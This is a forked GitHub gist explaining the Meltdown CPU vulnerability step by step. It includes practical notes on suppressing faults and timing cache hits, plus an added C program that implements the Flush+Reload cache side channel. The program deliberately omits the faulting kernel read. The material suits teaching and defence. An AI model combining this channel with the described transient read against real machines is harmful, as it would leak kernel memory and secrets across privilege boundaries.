@AgtLucas
Forked from headius/meltdown_in_a_nutshell.md
Created January 4, 2018 23:59
How Meltdown Works

Basic Algorithm

  1. The secret byte you want to read sits at a memory location priv_mem that the attacker is not allowed to access (for Meltdown: kernel memory that is mapped into the user process's address space but protected by the page tables).
  2. The attacker triggers an access exception by attempting to load priv_mem from user mode.
  3. Because of out-of-order execution, the load of secret and the dependent access in steps 4 and 5 can execute transiently before the exception is actually raised and the faulting instruction retires.
  4. Calculate an offset into a known array probe by multiplying secret by a stride of at least one cache line (the Meltdown paper uses a 4 KiB page stride, so the hardware prefetcher does not also pull in neighbouring slots).
  5. Touching probe[offset] loads exactly one slot of the array into the cache.
  6. The exception is delivered and the architectural effects of the transient instructions are discarded (registers roll back), but the cache is not restored: the loaded line stays there.
  7. Time a load from each of the 256 slots of probe (Flush+Reload); the slot that loads fast reveals the value of secret. Repeat for the next byte.

Notes

  • The probe array is flushed from the cache (e.g. with clflush) before each attempt, so only the secret-based offset gets cached; the loads in step 7 must be timed with a high-resolution counter such as rdtscp, and a cache hit is typically tens of cycles against a few hundred for a miss.
  • The access exception raises a fault (SIGSEGV) that would terminate the process, so the faulting access is performed where the crash can be absorbed: in a forked child process, behind a signal handler that recovers from the fault, or inside an Intel TSX transaction that aborts silently instead of faulting.
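The cache side channel in steps 4 to 7 is the part of the attack that can be tried without the faulting kernel read. The C program below is an added example, not part of headius's gist: it flushes a 256-slot probe array, has transmit() touch one slot in place of the transient load (the access fault of steps 1 to 3 is deliberately not reproduced), then times every slot with rdtscp and picks the fastest. Assumptions: an x86 CPU for clflush and rdtscp (on other architectures a timing-only fallback compiles but cannot recover bytes), a 4 KiB STRIDE as in the Meltdown paper, and a constructed byte string "Meltdown" standing in for priv_mem.

```c
/*
 * Added example (not the gist author's code): the Flush+Reload covert channel
 * of steps 4-7. The faulting read of priv_mem is NOT reproduced; transmit()
 * touches the probe slot directly, standing in for the transient load.
 * Assumptions: x86 for clflush/rdtscp (non-x86 fallback is timing only and
 * will not recover bytes); STRIDE and the "Meltdown" string are constructed.
 * Build: cc -O2 meltdown_channel.c
 */
#define _POSIX_C_SOURCE 199309L
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define STRIDE 4096 /* one page per slot, as in the Meltdown paper */

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static void flush(const void *p) { _mm_clflush(p); }
static uint64_t time_access(const volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_lfence();                  /* keep the load after the first timestamp */
    uint8_t v = *p;                /* volatile: the load is really issued */
    (void)v;
    uint64_t t1 = __rdtscp(&aux);  /* rdtscp waits for the load to complete */
    return t1 - t0;
}
#else
#include <time.h>
static void flush(const void *p) { (void)p; } /* no portable cache flush */
static uint64_t time_access(const volatile uint8_t *p) {
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    uint8_t v = *p;
    (void)v;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)(b.tv_sec - a.tv_sec) * 1000000000ULL
         + (uint64_t)(b.tv_nsec - a.tv_nsec);
}
#endif

/* volatile so the compiler cannot fold away reads of a never-written array */
static volatile uint8_t probe[256 * STRIDE];
static volatile uint8_t sink;

/* Step 4: one slot per possible byte value. */
size_t probe_offset(uint8_t secret) { return (size_t)secret * STRIDE; }

/* Step 5 stand-in: leave exactly one probe slot in the cache. */
static void transmit(uint8_t secret) { sink = probe[probe_offset(secret)]; }

static void flush_probe(void) {
    for (int i = 0; i < 256; i++) flush((const void *)&probe[i * STRIDE]);
}

/* Step 7: the fastest slot identifies the byte (lowest index wins ties). */
int decode_timings(const uint64_t t[256]) {
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (t[i] < t[best]) best = i;
    return best;
}

/* One flush, one "transient" access, one Flush+Reload sweep. */
int recover_byte_once(uint8_t secret) {
    uint64_t t[256];
    flush_probe();
    transmit(secret);
    /* Visit slots in a scrambled order so a stride prefetcher cannot warm them. */
    for (int i = 0; i < 256; i++) {
        int k = (i * 167 + 13) & 255;   /* 167 is odd, so this is a permutation */
        t[k] = time_access(&probe[k * STRIDE]);
    }
    return decode_timings(t);
}

/* Real attacks repeat and vote, because a single sweep is noisy. */
int recover_byte(uint8_t secret, int rounds) {
    int votes[256] = {0};
    for (int r = 0; r < rounds; r++) votes[recover_byte_once(secret)]++;
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (votes[i] > votes[best]) best = i;
    return best;
}

int main(void) {
    const char *secret = "Meltdown"; /* constructed stand-in for priv_mem */
    char out[9] = {0};
    for (int i = 0; i < 8; i++)
        out[i] = (char)recover_byte((uint8_t)secret[i], 16);
    printf("recovered: %s\n", out);
    return 0;
}
```

The voting in recover_byte is what makes a single noisy sweep usable; raise the round count if the recovered string has wrong characters on a busy machine. The scrambled visiting order and the page-sized STRIDE exist for the same reason: a sequential walk with 64-byte slots lets the prefetcher pull in slots the transient load never touched, which shows up as spurious hits.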